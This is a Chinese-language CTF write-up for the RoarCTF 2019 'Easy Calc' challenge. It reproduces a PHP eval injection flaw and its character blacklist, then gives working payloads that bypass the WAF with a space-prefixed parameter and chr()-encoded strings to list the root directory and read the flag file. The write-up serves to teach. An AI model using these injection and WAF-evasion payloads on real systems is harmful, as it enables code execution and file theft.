[RoarCTF 2019]Easy Calc 1
发现
1.查看源代码,发现PHP文件
<!DOCTYPE html> <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>简单的计算器</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="./libs/bootstrap.min.css"> <script src="./libs/jquery-3.3.1.min.js"></script> <script src="./libs/bootstrap.min.js"></script> </head> <body> <div class="container text-center" style="margin-top:30px;"> <h2>表达式</h2> <form id="calc"> <div class="form-group"> <input type="text" class="form-control" id="content" placeholder="输入计算式" data-com.agilebits.onepassword.user-edited="yes"> </div> <div id="result"><div class="alert alert-success"> </div></div> <button type="submit" class="btn btn-primary">计算</button> </form> </div> <!--I've set up WAF to ensure security.-->
<script> $('#calc').submit(function(){ $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), type:'GET', success:function(data){ $("#result").html(`<div class="alert alert-success"> <strong>答案:</strong>${data} </div>`); }, error:function(){ alert("这啥?算不来!"); } }) return false; }) </script> </body></html>
1.知识点
额外知识点:
HTML:meta、link 标签
CSS:基础知识
IPS/IDS/WAF:入侵检测系统/入侵防御系统/Web应用防护系统
解题知识点:
1.提示信息
<!--I've set up WAF to ensure security.--
2.关键代码
url:"calc.php?num="+encodeURIComponent($("#content").val()),
$("#content").val() 的意思:
获取id为content的HTML标签元素的值,是JQuery。
$("#content")相当于document.getElementById("content");
$("#content").val()相当于 document.getElementById("content").value;
2.查看PHP文件
<?php
error_reporting(0);
if(!isset($_GET['num'])){
show_source(__FILE__);
}else{
$str = $_GET['num'];
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $str)) {
die("what are you want to do?");
}
}
eval('echo '.$str.';');
}
?>
2.步骤
1.扫一下根目录 ,发现flagg文件
? num=1;var_dump(scandir(chr(47)))
1array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" }
知识点解析:(? num=1;var_dump(scandir(chr(47))))
①:scandir — 列出指定路径中的文件和目录。
②:var_dump() — 函数用于输出变量的相关信息。
③:chr(47) — 是指ascii码为47的字符为/而/在linux中指的是根目录。
④:unm=1 — 指输入的名称为1。
总结:输出并列出指定路径中的文件和根目录。
2.列出flagg:
?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
1string(43) "flag{911690af-38e3-40ec-bb94-0390b0aa402c} "
知识点解析:(/calc.php?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))))
①:file_get_contents() — 函数是用于将文件的内容读入到一个字符串中的首选方法。如果操作系统支持,还会使用内存映射技术来增强性能。
②:var_dump() — 函数用于输出变量的相关信息。
③:%20 — 空格的html编码,如果两个空格的话就是两个%20。
④:chr(47).chr(102).chr(49).chr(97).chr(103).chr(103) — 指的是ascii码转换为f1agg
总结:输出calc.php文件中f1agg目录的字符串内容。
3.解析
为什么要在num前加一个空格?
答:假如waf不允许num变量传递字母,可以在num前加个空格,这样waf就找不到num这个变量了,因为现在的变量叫“ num”,而不是“num”。但php在解析的时候,会先把空格给去掉,这样我们的代码还能正常运行,还上传了非法字符。
发现过滤怎么办?
答:用char()转ascii再进行拼接
PHP的字符串解析特性是什么?
答: PHP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:1.删除空白符 2.将某些字符转换为下划线(包括空格)【当waf不让你过的时候,php却可以让你过】
